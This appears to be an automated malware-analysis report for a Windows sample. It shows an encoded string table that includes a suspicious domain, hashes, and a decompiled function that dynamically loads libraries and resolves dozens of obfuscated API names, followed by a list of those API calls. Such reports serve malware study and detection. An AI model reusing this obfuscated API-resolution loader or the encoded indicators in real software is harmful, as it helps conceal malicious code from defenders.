kDLARa3/0Y=$HbYXlkDLARa3/0aAkw==$HbYXm0zeBiq/90eJipVdwaOk06PE$HbYXnEbEBSm7zE2jhK0=$HbYXnEbEBSmK7E6g$HbYXnUbDESm7w0qpjqJT2bKtwpE=$HbcKoEXSFxa28FehhJtc$HbcKoEXSFxaq5FGxnpw=$HbcKoG3OFzWx9kaMho1V0Q==$HbcKoG7CEAyz5ESgroJR27ONyKM=$HbcKoG7CEAyz5ESgroJR27ONyKPjfI9p$HbcKoGrVASSq4GGsn4FTxJGa1b34V7xYWYpn$HbcKoHrGEiCX6EKijrhd56Oa37Hd$HbcKoHrGEiCX6EKijrhd8r6E3w==$HbwMt0XCRAa290yojg==$HpowgGXmPQ==$HqYTvEDEBTG7zUKrj4BX$HrYPtV3CIiyy4GI=$HrYPtV3CKye04ECx$HroQoEXGHQu/6EY=$HroQoEXGHRO791CshII=$HroQoEXGHX/+oFA=$HrwOsUDJRAu/6Eb/y8lB$IuVX$IutV$KA==$KaIPuV3CV2u66U8=$KaIPuV3CVxq47E2kh4VI0Q==$KaIPuV3CVxq96Uy2jg==$KaIPuV3CVxq96k+whoJt1q6c36M=$KaIPuV3CVxq96k+whoJt1ruH2A==$KaIPuV3CVxq96k+whoJtwLKQzg==$KaIPuV3CVxqt8Ua1$KaIPuV3CVxqu90a1ip5X66Ha$KaIPuV3CVxqx9Uar$KaoQpEzKSjGm8Q==$KbYGtAfUASax$KbsGvEWUVmu66U8=$KbsPp0jXDWu66U8=$KqACoECJZCmy$KrIQo17IFiGtq1e9nw==$KrIQo1nPFiSt4A2vmINc$L6AGohqVSiGy6Q==$L6AGokfGCSCY7Eapjw==$LLIWvF3ECCzw4U+p$LQ==$LaATokDJECOf$LboNtEbQSTaq5FegxYZB27k=$LboNuUfCEGu66U8=$M70FvwfUASax$MbYRvkzLV3fw4U+p$MbYao13IFiA=$N6YPpEDDCyK7q1Skh4BXwA==$Nb8G4xuJZCmy$NqAXokrGEAQ=$NrwEuUfUSi+t6k0=$O/g=$O6YXv0/OCCmC2Qa2tMlBmqOQzg==$O7cVsVnOV3fw4U+p$OLARqVnTSiGy6Q==$OaEaoF2UVmu66U8=$Ob4H/kzfAQ==$ObA/jAzUO2Ctq1e9nw==$ObwMu0DCF2ut9E+sn4k=$ObwMu0DCFxmCoFCazp8cwK+c$P6sMtFzUSiax60XrgZ9d2g==$P71jolDXECC60FCgmYJT2bI=$P71jolDXECC61UK2mJtdxrM=$PLoPtQ==$PLwRvUHOFzGx91rrmJ1e3aON$PLwRvXrSBii38XaXpw==$PaYKtA==$PbcK4xuJZCmy$PbcKoEXSF2u66U8=$PrYFsVzLEBqp5E+pjpg=$WrwNtROHQTY=$YIkMvkyJLSG761esjYVXxg==$a5EmlhnmUXKcwBL026p2gOHf+w==$cA==$cKQCvAOJZCSq$chrisproperties.xyz$dA==$dLYbtQ==$dP0/jFnVCyO36Ua2xYVc3Q==$dbBDpEjUDy636U/lxJxb0PfN3vCWNZB+dbhSuBsiomacwW5lQ1L7ojV4/Yi6YDUz+hgt/VVn$f6A/jAM=$f6A/jAM=$f6A/jAzU$f6A/jGTIHiyy6UKZt6pbxrKO1ajsSYV+e61e9FsirCnS+g==$f6A=$f6BGtA==$f6BM4QfNFCI=$f6BM4gfNFCI=$f6BM4wfNFCI=$f6BM5AfNFCI=$f6BM5QfNFCI=$f6BM5gfNFCI=$f6BM5wfNFCI=$f6BMvUjOCmuu7VM=$f6Bq9Vo=$f6Bq9VquQTbXoFDMzp87kaThn6M=$f7c89U34QSGBoEeazohtkbM=$f7cb9U0=$f7dDnWs=$f7dM9U2IQSH+oEf/zogIkbM=$image/jpeg$screenshot.jpg
API String ID: 1357844191-3763699314
Opcode ID: 6f8cb20aac617aab04c351005cb659d4ba125b5664bb62c5848c98877262039e
Instruction ID: 16ec5335bbb413572156de7ec1124d7d50ca0737df3c893a91d511cad085a27a
Opcode Fuzzy Hash: 6f8cb20aac617aab04c351005cb659d4ba125b5664bb62c5848c98877262039e
Instruction Fuzzy Hash: 57D2FBF5F402607FAA00AB727F0352A3660EE11708BA510BFEC0545656F6ED7624EB9F

Uniqueness

Uniqueness Score: -1.00%

Function 00419700, Relevance: 210.7, APIs: 118, Strings: 2, Instructions: 730
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419700(void* __ecx) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				struct HINSTANCE__* _v28;
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__* _v40;
				struct HINSTANCE__* _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				CHAR* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				struct HINSTANCE__* _t138;
				CHAR* _t139;
				struct HINSTANCE__* _t140;
				struct HINSTANCE__* _t141;
				struct HINSTANCE__* _t142;
				CHAR* _t143;
				struct HINSTANCE__* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t146;
				CHAR* _t147;
				_Unknown_base(*)()* _t149;
				CHAR* _t150;
				CHAR* _t155;
				CHAR* _t160;
				_Unknown_base(*)()* _t161;
				CHAR* _t165;
				CHAR* _t170;
				CHAR* _t175;
				CHAR* _t180;
				CHAR* _t185;
				CHAR* _t188;
				CHAR* _t193;
				CHAR* _t198;
				CHAR* _t201;
				CHAR* _t204;
				CHAR* _t210;
				CHAR* _t215;
				CHAR* _t220;
				CHAR* _t227;
				CHAR* _t232;
				intOrPtr _t233;
				CHAR* _t238;
				CHAR* _t243;
				CHAR* _t248;
				CHAR* _t253;
				CHAR* _t258;
				CHAR* _t263;
				CHAR* _t268;
				CHAR* _t273;
				CHAR* _t278;
				CHAR* _t283;
				CHAR* _t288;
				CHAR* _t293;
				CHAR* _t298;
				CHAR* _t303;
				CHAR* _t308;
				CHAR* _t313;
				CHAR* _t318;
				CHAR* _t322;
				CHAR* _t323;
				CHAR* _t324;
				CHAR* _t325;
				CHAR* _t327;
				CHAR* _t329;
				CHAR* _t331;
				CHAR* _t333;
				CHAR* _t335;
				CHAR* _t336;
				CHAR* _t338;
				CHAR* _t340;
				CHAR* _t342;
				CHAR* _t344;
				CHAR* _t347;
				CHAR* _t350;
				CHAR* _t352;
				CHAR* _t354;
				CHAR* _t356;
				CHAR* _t358;
				CHAR* _t359;
				CHAR* _t361;
				CHAR* _t364;
				CHAR* _t366;
				CHAR* _t368;
				CHAR* _t370;
				CHAR* _t372;
				CHAR* _t374;
				CHAR* _t376;
				CHAR* _t378;
				CHAR* _t380;
				CHAR* _t382;
				CHAR* _t384;
				CHAR* _t386;
				CHAR* _t388;
				CHAR* _t390;
				CHAR* _t392;
				CHAR* _t394;
				CHAR* _t396;
				CHAR* _t398;
				CHAR* _t399;
				CHAR* _t400;
				CHAR* _t401;
				CHAR* _t403;
				CHAR* _t405;
				CHAR* _t407;
				CHAR* _t409;
				CHAR* _t412;
				CHAR* _t414;
				CHAR* _t416;
				CHAR* _t418;
				CHAR* _t420;
				CHAR* _t422;
				CHAR* _t423;
				CHAR* _t425;
				CHAR* _t426;
				CHAR* _t428;
				CHAR* _t430;
				CHAR* _t432;
				CHAR* _t434;
				CHAR* _t436;
				intOrPtr _t438;
				CHAR* _t440;
				CHAR* _t442;
				CHAR* _t444;
				CHAR* _t446;
				CHAR* _t448;
				CHAR* _t450;
				CHAR* _t452;
				CHAR* _t454;
				CHAR* _t456;
				CHAR* _t458;
				CHAR* _t460;
				CHAR* _t462;
				CHAR* _t464;
				CHAR* _t466;
				CHAR* _t468;
				CHAR* _t470;

				_v44 = E004196D0(__ecx);
				if(_v44 != 0) {
					_t233 =  *0x432204; // 0xc18508
					 *0x432898 = E004195A0(_v44, _t233);
					_t438 =  *0x432438; // 0xc18478
					 *0x43280c = E004195A0(_v44, _t438);
					_t364 =  *0x4326e8; // 0xc18370
					 *0x432814 = GetProcAddress(_v44, _t364);
					_t238 =  *0x432540; // 0xc18080
					 *0x4328d4 = GetProcAddress(_v44, _t238);
					_t440 =  *0x4324b4; // 0xc18490
					 *0x4328bc = GetProcAddress(_v44, _t440);
					_t366 =  *0x4320e0; // 0xc185b0
					 *0x432908 = GetProcAddress(_v44, _t366);
					_t243 =  *0x432554; // 0xc18520
					 *0x432888 = GetProcAddress(_v44, _t243);
					_t442 =  *0x432274; // 0xc18538
					 *0x43278c = GetProcAddress(_v44, _t442);
					_t368 =  *0x4325cc; // 0xc18658
					 *0x4327c0 = GetProcAddress(_v44, _t368);
					_t248 =  *0x4320dc; // 0xc182c0
					 *0x432910 = GetProcAddress(_v44, _t248);
					_t444 =  *0x4326c8; // 0xc180a0
					 *0x432878 = GetProcAddress(_v44, _t444);
					_t370 =  *0x43213c; // 0xc18460
					 *0x4328c0 = GetProcAddress(_v44, _t370);
					_t253 =  *0x432230; // 0xc17f20
					 *0x4328e8 = GetProcAddress(_v44, _t253);
					_t446 =  *0x432218; // 0xc18610
					 *0x432840 = GetProcAddress(_v44, _t446);
					_t372 =  *0x4326c0; // 0xc18200
					 *0x4328f4 = GetProcAddress(_v44, _t372);
					_t258 =  *0x4322fc; // 0xc18220
					 *0x432774 = GetProcAddress(_v44, _t258);
					_t448 =  *0x432580; // 0xc16158
					 *0x4327d0 = GetProcAddress(_v44, _t448);
					_t374 =  *0x4323dc; // 0xc18180
					 *0x432848 = GetProcAddress(_v44, _t374);
					_t263 =  *0x43245c; // 0xc184a8
					 *0x432894 = GetProcAddress(_v44, _t263);
					_t450 =  *0x432270; // 0xc184c0
					 *0x432798 = GetProcAddress(_v44, _t450);
					_t376 =  *0x4321e8; // 0xc18240
					 *0x432824 = GetProcAddress(_v44, _t376);
					_t268 =  *0x4323d4; // 0xc17fc0
					 *0x43285c = GetProcAddress(_v44, _t268);
					_t452 =  *0x43238c; // 0xc181a0
					 *0x432780 = GetProcAddress(_v44, _t452);
					_t378 =  *0x4324e4; // 0xc18260
					 *0x4328d0 = GetProcAddress(_v44, _t378);
					_t273 =  *0x432500; // 0xc18100
					 *0x4327f8 = GetProcAddress(_v44, _t273);
					_t454 =  *0x432340; // 0xc184f0
					 *0x432914 = GetProcAddress(_v44, _t454);
					_t380 =  *0x432628; // 0xc180c0
					 *0x432884 = GetProcAddress(_v44, _t380);
					_t278 =  *0x43257c; // 0xc15fa0
					 *0x432770 = GetProcAddress(_v44, _t278);
					_t456 =  *0x43237c; // 0xc184d8
					 *0x43286c = GetProcAddress(_v44, _t456);
					_t382 =  *0x43249c; // 0xc18628
					 *0x4327a4 = GetProcAddress(_v44, _t382);
					_t283 =  *0x432314; // 0xc183a0
					 *0x43288c = GetProcAddress(_v44, _t283);
					_t458 =  *0x432648; // 0xc18640
					 *0x4328dc = GetProcAddress(_v44, _t458);
					_t384 =  *0x4325d8; // 0xc18580
					 *0x432820 = GetProcAddress(_v44, _t384);
					_t288 =  *0x43255c; // 0xc183b8
					 *0x4327d8 = GetProcAddress(_v44, _t288);
					_t460 =  *0x4324e0; // 0xc18388
					 *0x43276c = GetProcAddress(_v44, _t460);
					_t386 =  *0x43267c; // 0xc18598
					 *0x4328c4 = GetProcAddress(_v44, _t386);
					_t293 =  *0x43217c; // 0xc185c8
					 *0x432854 = GetProcAddress(_v44, _t293);
					_t462 =  *0x4322b0; // 0xc183d0
					 *0x4328d8 = GetProcAddress(_v44, _t462);
					_t388 =  *0x4325c4; // 0xc183e8
					 *0x4328e4 = GetProcAddress(_v44, _t388);
					_t298 =  *0x4326d0; // 0xc18400
					 *0x432864 = GetProcAddress(_v44, _t298);
					_t464 =  *0x4321fc; // 0xc18418
					 *0x4327c4 = GetProcAddress(_v44, _t464);
					_t390 =  *0x4325a4; // 0xc180e0
					 *0x432790 = GetProcAddress(_v44, _t390);
					_t303 =  *0x4323f4; // 0xc18430
					 *0x4328a4 = GetProcAddress(_v44, _t303);
					_t466 =  *0x4323ec; // 0xc186b8
					 *0x432860 = GetProcAddress(_v44, _t466);
					_t392 =  *0x4322c8; // 0xc181c0
					 *0x432850 = GetProcAddress(_v44, _t392);
					_t308 =  *0x43266c; // 0xc18730
					 *0x4328e0 = GetProcAddress(_v44, _t308);
					_t468 =  *0x4320ac; // 0xc18280
					 *0x4328f8 = GetProcAddress(_v44, _t468);
					_t394 =  *0x43218c; // 0xc17f40
					 *0x432794 = GetProcAddress(_v44, _t394);
					_t313 =  *0x4321b8; // 0xc15f78
					 *0x432844 = GetProcAddress(_v44, _t313);
					_t470 =  *0x432330; // 0xc18718
					 *0x4328c8 = GetProcAddress(_v44, _t470);
					_t396 =  *0x432124; // 0xc186d0
					 *0x432904 = GetProcAddress(_v44, _t396);
					_t318 =  *0x432428; // 0xc18670
					 *0x4327bc = GetProcAddress(_v44, _t318);
					 *0x4328f0 = GetProcAddress(_v44, "HeapFree");
				}
				_t135 =  *0x432318; // 0xc17918
				_t136 = LoadLibraryA(_t135); // executed
				_v40 = _t136;
				_t322 =  *0x4322dc; // 0xc17948
				_t137 = LoadLibraryA(_t322); // executed
				_v36 = _t137;
				_t398 =  *0x4321d8; // 0xc17960
				_t138 = LoadLibraryA(_t398); // executed
				_v32 = _t138;
				_t139 =  *0x432234; // 0xc178a0
				_t140 = LoadLibraryA(_t139); // executed
				_v48 = _t140;
				_t323 =  *0x432560; // 0xc17900
				_t141 = LoadLibraryA(_t323); // executed
				_v12 = _t141;
				_t399 =  *0x43262c; // 0xc178b8
				_t142 = LoadLibraryA(_t399); // executed
				_v20 = _t142;
				_t143 =  *0x4325dc; // 0xc18448
				_t144 = LoadLibraryA(_t143); // executed
				_v28 = _t144;
				_t324 =  *0x43221c; // 0xc18568
				_t145 = LoadLibraryA(_t324); // executed
				_v24 = _t145;
				_t400 =  *0x432364; // 0xc185e0
				_t146 = LoadLibraryA(_t400); // executed
				_v8 = _t146;
				_t147 =  *0x432160; // 0xc185f8
				_v16 = LoadLibraryA(_t147);
				_t325 =  *0x432108; // 0xc18550
				_t149 = LoadLibraryA(_t325);
				_v52 = _t149;
				if(_v40 != 0) {
					_t434 =  *0x432150; // 0xc16040
					 *0x432804 = GetProcAddress(_v40, _t434);
					_t359 =  *0x432668; // 0xc17f60
					 *0x4328a0 = GetProcAddress(_v40, _t359);
					_t227 =  *0x4324a4; // 0xc16180
					 *0x4327c8 = GetProcAddress(_v40, _t227);
					_t436 =  *0x43233c; // 0xc17f80
					 *0x4327b4 = GetProcAddress(_v40, _t436);
					_t361 =  *0x4324b0; // 0xc16220
					 *0x4327a0 = GetProcAddress(_v40, _t361);
					_t232 =  *0x432110; // 0xc18688
					_t149 = GetProcAddress(_v40, _t232);
					 *0x4328cc = _t149;
				}
				if(_v36 != 0) {
					_t426 =  *0x432424; // 0xc18120
					 *0x432838 = GetProcAddress(_v36, _t426);
					_t352 =  *0x4324fc; // 0xc17fa0
					 *0x432810 = GetProcAddress(_v36, _t352);
					_t210 =  *0x4326b4; // 0xc18040
					 *0x432828 = GetProcAddress(_v36, _t210);
					_t428 =  *0x432454; // 0xc186a0
					 *0x4327d4 = GetProcAddress(_v36, _t428);
					_t354 =  *0x43226c; // 0xc18000
					 *0x432900 = GetProcAddress(_v36, _t354);
					_t215 =  *0x4324c0; // 0xc17ce0
					 *0x43283c = GetProcAddress(_v36, _t215);
					_t430 =  *0x4323ac; // 0xc18700
					 *0x4327e4 = GetProcAddress(_v36, _t430);
					_t356 =  *0x43225c; // 0xc17b20
					 *0x432800 = GetProcAddress(_v36, _t356);
					_t220 =  *0x4324f0; // 0xc17d40
					 *0x432830 = GetProcAddress(_v36, _t220);
					_t432 =  *0x43265c; // 0xc17cc0
					 *0x432834 = GetProcAddress(_v36, _t432);
					_t358 =  *0x432280; // 0xc17ec0
					_t149 = GetProcAddress(_v36, _t358);
					 *0x43289c = _t149;
				}
				if(_v32 != 0) {
					_t204 =  *0x43232c; // 0xc17d20
					 *0x4327e0 = GetProcAddress(_v32, _t204);
					_t425 =  *0x432114; // 0xc17d00
					_t149 = GetProcAddress(_v32, _t425);
					 *0x4327cc = _t149;
				}
				if(_v48 != 0) {
					_t350 =  *0x432378; // 0xc17dc0
					_t149 = GetProcAddress(_v48, _t350);
					 *0x4327f0 = _t149;
				}
				if(_v20 != 0) {
					_t201 =  *0x432470; // 0xc17c60
					 *0x4327a8 = GetProcAddress(_v20, _t201);
					_t423 =  *0x432308; // 0xc186e8
					_t149 = GetProcAddress(_v20, _t423);
					 *0x4328ac = _t149;
				}
				if(_v24 != 0) {
					_t347 =  *0x43227c; // 0xc17d60
					 *0x432868 = GetProcAddress(_v24, _t347);
					_t198 =  *0x4326b0; // 0xc188c8
					 *0x4327f4 = GetProcAddress(_v24, _t198);
					_t422 =  *0x43210c; // 0xc17b40
					_t149 = GetProcAddress(_v24, _t422);
					 *0x432870 = _t149;
				}
				if(_v28 != 0) {
					_t342 =  *0x43261c; // 0xc189d0
					 *0x4327ac = GetProcAddress(_v28, _t342);
					_t188 =  *0x4324c8; // 0xc17c00
					 *0x432918 = GetProcAddress(_v28, _t188);
					_t418 =  *0x4321b4; // 0xc18868
					 *0x432858 = GetProcAddress(_v28, _t418);
					_t344 =  *0x432528; // 0xc189e8
					 *0x43282c = GetProcAddress(_v28, _t344);
					_t193 =  *0x432674; // 0xc17d80
					 *0x43290c = GetProcAddress(_v28, _t193);
					_t420 =  *0x43222c; // 0xc187a8
					 *0x4327e8 = GetProcAddress(_v28, _t420);
					_t149 = GetProcAddress(_v28, "RegEnumValueA");
					 *0x432874 = _t149;
				}
				if(_v12 != 0) {
					_t416 =  *0x43212c; // 0xc18880
					_t149 = GetProcAddress(_v12, _t416);
					 *0x432818 = _t149;
				}
				if(_v8 != 0) {
					_t336 =  *0x4323a4; // 0xc15e88
					 *0x4327b0 = GetProcAddress(_v8, _t336);
					_t175 =  *0x4322a4; // 0xc17b60
					 *0x4327ec = GetProcAddress(_v8, _t175);
					_t412 =  *0x4322f8; // 0xc15f50
					 *0x432880 = GetProcAddress(_v8, _t412);
					_t338 =  *0x432214; // 0xc17de0
					 *0x432788 = GetProcAddress(_v8, _t338);
					_t180 =  *0x43219c; // 0xc18898
					 *0x4328b0 = GetProcAddress(_v8, _t180);
					_t414 =  *0x432490; // 0xc18850
					 *0x432890 = GetProcAddress(_v8, _t414);
					_t340 =  *0x4326dc; // 0xc17c80
					 *0x43284c = GetProcAddress(_v8, _t340);
					_t185 =  *0x432360; // 0xc17e00
					_t149 = GetProcAddress(_v8, _t185);
					 *0x4327b8 = _t149;
				}
				if(_v16 != 0) {
					_t405 =  *0x432468; // 0xc188b0
					 *0x43281c = GetProcAddress(_v16, _t405);
					_t331 =  *0x4321c8; // 0xc18a48
					 *0x432808 = GetProcAddress(_v16, _t331);
					_t165 =  *0x432278; // 0xc17f00
					 *0x43279c = GetProcAddress(_v16, _t165);
					_t407 =  *0x4326bc; // 0xc17e20
					 *0x4327fc = GetProcAddress(_v16, _t407);
					_t333 =  *0x4322c0; // 0xc172c8
					 *0x43277c = GetProcAddress(_v16, _t333);
					_t170 =  *0x4325a0; // 0xc18a00
					 *0x432784 = GetProcAddress(_v16, _t170);
					_t409 =  *0x432264; // 0xc187c0
					 *0x4327dc = GetProcAddress(_v16, _t409);
					_t335 =  *0x432578; // 0xc18a18
					_t149 = GetProcAddress(_v16, _t335);
					 *0x4328b8 = _t149;
				}
				if(_v52 != 0) {
					_t150 =  *0x4324ac; // 0xc17da0
					 *0x4328b4 = GetProcAddress(_v52, _t150);
					_t401 =  *0x432304; // 0xc18928
					 *0x432768 = GetProcAddress(_v52, _t401);
					_t327 =  *0x4323cc; // 0xc18958
					 *0x4328a8 = GetProcAddress(_v52, _t327);
					_t155 =  *0x43229c; // 0xc17ba0
					 *0x4328fc = GetProcAddress(_v52, _t155);
					_t403 =  *0x4325c0; // 0xc17248
					 *0x4328ec = GetProcAddress(_v52, _t403);
					_t329 =  *0x432590; // 0xc17e40
					 *0x432778 = GetProcAddress(_v52, _t329);
					_t160 =  *0x432584; // 0xc17e60
					_t161 = GetProcAddress(_v52, _t160);
					 *0x43287c = _t161;
					return _t161;
				}
				return _t149;
			}

0x0041970b
0x00419712
0x00419718
0x0041972a
0x0041972f
0x00419742
0x00419747
0x00419758
0x0041975d
0x0041976d
0x00419772
0x00419783
0x00419788
0x00419799
0x0041979e
0x004197ae
0x004197b3
0x004197c4
0x004197c9
0x004197da
0x004197df
0x004197ef
0x004197f4
0x00419805
0x0041980a
0x0041981b
0x00419820
0x00419830
0x00419835
0x00419846
0x0041984b
0x0041985c
0x00419861
0x00419871
0x00419876
0x00419887
0x0041988c
0x0041989d
0x004198a2
0x004198b2
0x004198b7
0x004198c8
0x004198cd
0x004198de
0x004198e3
0x004198f3
0x004198f8
0x00419909
0x0041990e
0x0041991f
0x00419924
0x00419934
0x00419939
0x0041994a
0x0041994f
0x00419960
0x00419965
0x00419975
0x0041997a
0x0041998b
0x00419990
0x004199a1
0x004199a6
0x004199b6
0x004199bb
0x004199cc
0x004199d1
0x004199e2
0x004199e7
0x004199f7
0x004199fc
0x00419a0d
0x00419a12
0x00419a23
0x00419a28
0x00419a38
0x00419a3d
0x00419a4e
0x00419a53
0x00419a64
0x00419a69
0x00419a79
0x00419a7e
0x00419a8f
0x00419a94
0x00419aa5
0x00419aaa
0x00419aba
0x00419abf
0x00419ad0
0x00419ad5
0x00419ae6
0x00419aeb
0x00419afb
0x00419b00
0x00419b11
0x00419b16
0x00419b27
0x00419b2c
0x00419b3c
0x00419b41
0x00419b52
0x00419b57
0x00419b68
0x00419b6d
0x00419b7d
0x00419b91
0x00419b91
0x00419b96
0x00419b9c
0x00419ba2
0x00419ba5
0x00419bac
0x00419bb2
0x00419bb5
0x00419bbc
0x00419bc2
0x00419bc5
0x00419bcb
0x00419bd1
0x00419bd4
0x00419bdb
0x00419be1
0x00419be4
0x00419beb
0x00419bf1
0x00419bf4
0x00419bfa
0x00419c00
0x00419c03
0x00419c0a
0x00419c10
0x00419c13
0x00419c1a
0x00419c20
0x00419c23
0x00419c2f
0x00419c32
0x00419c39
0x00419c3f
0x00419c46
0x00419c4c
0x00419c5d
0x00419c62
0x00419c73
0x00419c78
0x00419c88
0x00419c8d
0x00419c9e
0x00419ca3
0x00419cb4
0x00419cb9
0x00419cc3
0x00419cc9
0x00419cc9
0x00419cd2
0x00419cd8
0x00419ce9
0x00419cee
0x00419cff
0x00419d04
0x00419d14
0x00419d19
0x00419d2a
0x00419d2f
0x00419d40
0x00419d45
0x00419d55
0x00419d5a
0x00419d6b
0x00419d70
0x00419d81
0x00419d86
0x00419d96
0x00419d9b
0x00419dac
0x00419db1
0x00419dbc
0x00419dc2
0x00419dc2
0x00419dcb
0x00419dcd
0x00419ddd
0x00419de2
0x00419ded
0x00419df3
0x00419df3
0x00419dfc
0x00419dfe
0x00419e09
0x00419e0f
0x00419e0f
0x00419e18
0x00419e1a
0x00419e2a
0x00419e2f
0x00419e3a
0x00419e40
0x00419e40
0x00419e49
0x00419e4b
0x00419e5c
0x00419e61
0x00419e71
0x00419e76
0x00419e81
0x00419e87
0x00419e87
0x00419e90
0x00419e96
0x00419ea7
0x00419eac
0x00419ebc
0x00419ec1
0x00419ed2
0x00419ed7
0x00419ee8
0x00419eed
0x00419efd
0x00419f02
0x00419f13
0x00419f21
0x00419f27
0x00419f27
0x00419f30
0x00419f32
0x00419f3d
0x00419f43
0x00419f43
0x00419f4c
0x00419f52
0x00419f63
0x00419f68
0x00419f78
0x00419f7d
0x00419f8e
0x00419f93
0x00419fa4
0x00419fa9
0x00419fb9
0x00419fbe
0x00419fcf
0x00419fd4
0x00419fe5
0x00419fea
0x00419ff4
0x00419ffa
0x00419ffa
0x0041a003
0x0041a009
0x0041a01a
0x0041a01f
0x0041a030
0x0041a035
0x0041a045
0x0041a04a
0x0041a05b
0x0041a060
0x0041a071
0x0041a076
0x0041a086
0x0041a08b
0x0041a09c
0x0041a0a1
0x0041a0ac
0x0041a0b2
0x0041a0b2
0x0041a0bb
0x0041a0c1
0x0041a0d1
0x0041a0d6
0x0041a0e7
0x0041a0ec
0x0041a0fd
0x0041a102
0x0041a112
0x0041a117
0x0041a128
0x0041a12d
0x0041a13e
0x0041a143
0x0041a14d
0x0041a153
0x00000000
0x0041a153
0x0041a15b

APIs

GetProcAddress.KERNEL32(00000000,00C18370), ref: 00419752
GetProcAddress.KERNEL32(00000000,00C18080), ref: 00419767
GetProcAddress.KERNEL32(00000000,00C18490), ref: 0041977D
GetProcAddress.KERNEL32(00000000,00C185B0), ref: 00419793
GetProcAddress.KERNEL32(00000000,00C18520), ref: 004197A8
GetProcAddress.KERNEL32(00000000,00C18538), ref: 004197BE
GetProcAddress.KERNEL32(00000000,00C18658), ref: 004197D4
GetProcAddress.KERNEL32(00000000,00C182C0), ref: 004197E9
GetProcAddress.KERNEL32(00000000,00C180A0), ref: 004197FF
GetProcAddress.KERNEL32(00000000,00C18460), ref: 00419815
GetProcAddress.KERNEL32(00000000,00C17F20), ref: 0041982A
GetProcAddress.KERNEL32(00000000,00C18610), ref: 00419840
GetProcAddress.KERNEL32(00000000,00C18200), ref: 00419856
GetProcAddress.KERNEL32(00000000,00C18220), ref: 0041986B
GetProcAddress.KERNEL32(00000000,00C16158), ref: 00419881
GetProcAddress.KERNEL32(00000000,00C18180), ref: 00419897
GetProcAddress.KERNEL32(00000000,00C184A8), ref: 004198AC
GetProcAddress.KERNEL32(00000000,00C184C0), ref: 004198C2
GetProcAddress.KERNEL32(00000000,00C18240), ref: 004198D8
GetProcAddress.KERNEL32(00000000,00C17FC0), ref: 004198ED
GetProcAddress.KERNEL32(00000000,00C181A0), ref: 00419903
GetProcAddress.KERNEL32(00000000,00C18260), ref: 00419919
GetProcAddress.KERNEL32(00000000,00C18100), ref: 0041992E
GetProcAddress.KERNEL32(00000000,00C184F0), ref: 00419944
GetProcAddress.KERNEL32(00000000,00C180C0), ref: 0041995A
GetProcAddress.KERNEL32(00000000,00C15FA0), ref: 0041996F
GetProcAddress.KERNEL32(00000000,00C184D8), ref: 00419985
GetProcAddress.KERNEL32(00000000,00C18628), ref: 0041999B
GetProcAddress.KERNEL32(00000000,00C183A0), ref: 004199B0
GetProcAddress.KERNEL32(00000000,00C18640), ref: 004199C6
GetProcAddress.KERNEL32(00000000,00C18580), ref: 004199DC
GetProcAddress.KERNEL32(00000000,00C183B8), ref: 004199F1
GetProcAddress.KERNEL32(00000000,00C18388), ref: 00419A07
GetProcAddress.KERNEL32(00000000,00C18598), ref: 00419A1D
GetProcAddress.KERNEL32(00000000,00C185C8), ref: 00419A32
GetProcAddress.KERNEL32(00000000,00C183D0), ref: 00419A48
GetProcAddress.KERNEL32(00000000,00C183E8), ref: 00419A5E
GetProcAddress.KERNEL32(00000000,00C18400), ref: 00419A73
GetProcAddress.KERNEL32(00000000,00C18418), ref: 00419A89
GetProcAddress.KERNEL32(00000000,00C180E0), ref: 00419A9F
GetProcAddress.KERNEL32(00000000,00C18430), ref: 00419AB4
GetProcAddress.KERNEL32(00000000,00C186B8), ref: 00419ACA
GetProcAddress.KERNEL32(00000000,00C181C0), ref: 00419AE0
GetProcAddress.KERNEL32(00000000,00C18730), ref: 00419AF5
GetProcAddress.KERNEL32(00000000,00C18280), ref: 00419B0B
GetProcAddress.KERNEL32(00000000,00C17F40), ref: 00419B21
GetProcAddress.KERNEL32(00000000,00C15F78), ref: 00419B36
GetProcAddress.KERNEL32(00000000,00C18718), ref: 00419B4C
GetProcAddress.KERNEL32(00000000,00C186D0), ref: 00419B62
GetProcAddress.KERNEL32(00000000,00C18670), ref: 00419B77
GetProcAddress.KERNEL32(00000000,HeapFree), ref: 00419B8B
LoadLibraryA.KERNEL32(00C17918), ref: 00419B9C
LoadLibraryA.KERNEL32(00C17948), ref: 00419BAC
LoadLibraryA.KERNEL32(00C17960), ref: 00419BBC
LoadLibraryA.KERNEL32(00C178A0), ref: 00419BCB
LoadLibraryA.KERNEL32(00C17900), ref: 00419BDB
LoadLibraryA.KERNEL32(00C178B8), ref: 00419BEB
LoadLibraryA.KERNEL32(00C18448), ref: 00419BFA
LoadLibraryA.KERNEL32(00C18568), ref: 00419C0A
LoadLibraryA.KERNEL32(00C185E0), ref: 00419C1A
LoadLibraryA.KERNEL32(00C185F8), ref: 00419C29
LoadLibraryA.KERNEL32(00C18550), ref: 00419C39
GetProcAddress.KERNEL32(00000000,00C16040), ref: 00419C57
GetProcAddress.KERNEL32(00000000,00C17F60), ref: 00419C6D
GetProcAddress.KERNEL32(00000000,00C16180), ref: 00419C82
GetProcAddress.KERNEL32(00000000,00C17F80), ref: 00419C98
GetProcAddress.KERNEL32(00000000,00C16220), ref: 00419CAE
GetProcAddress.KERNEL32(00000000,00C18688), ref: 00419CC3
GetProcAddress.KERNEL32(00000000,00C18120), ref: 00419CE3
GetProcAddress.KERNEL32(00000000,00C17FA0), ref: 00419CF9
GetProcAddress.KERNEL32(00000000,00C18040), ref: 00419D0E
GetProcAddress.KERNEL32(00000000,00C186A0), ref: 00419D24
GetProcAddress.KERNEL32(00000000,00C18000), ref: 00419D3A
GetProcAddress.KERNEL32(00000000,00C17CE0), ref: 00419D4F
GetProcAddress.KERNEL32(00000000,00C18700), ref: 00419D65
GetProcAddress.KERNEL32(00000000,00C17B20), ref: 00419D7B
GetProcAddress.KERNEL32(00000000,00C17D40), ref: 00419D90
GetProcAddress.KERNEL32(00000000,00C17CC0), ref: 00419DA6
GetProcAddress.KERNEL32(00000000,00C17EC0), ref: 00419DBC
GetProcAddress.KERNEL32(00000000,00C17D20), ref: 00419DD7
GetProcAddress.KERNEL32(00000000,00C17D00), ref: 00419DED
